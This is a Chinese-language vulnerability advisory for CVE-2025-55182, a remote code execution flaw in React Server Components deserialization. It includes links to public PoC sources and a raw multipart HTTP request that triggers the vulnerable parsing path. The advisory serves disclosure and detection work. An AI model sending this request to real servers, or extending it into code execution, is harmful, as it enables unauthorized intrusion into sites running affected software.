React Server Components 远程代码执行漏洞(CVE-2025-55182)

日期: 2025-12-04 | 影响软件: React Server Components | POC: 已公开

漏洞描述

React ServerComponents在处理ReplyFlightStream的反序列化数据时缺乏必要校验，攻击者可构造任意模型字段、循环结构、ServerReference与multipart/form-data，诱使解析流程进入异常路径并触发模块加载与引用执行链，最终导致未授权代码执行。

PoC代码[已公开]

https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/
https://github.com/msanft/CVE-2025-55182

POST / HTTP/1.1
Host: 
Next-Action: x
X-Nextjs-Request-Id: b6dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

{}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

["$1:a:a"]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

来源: https://github.com/msanft/CVE-2025-55182

漏洞描述

PoC代码[已公开]

相关漏洞推荐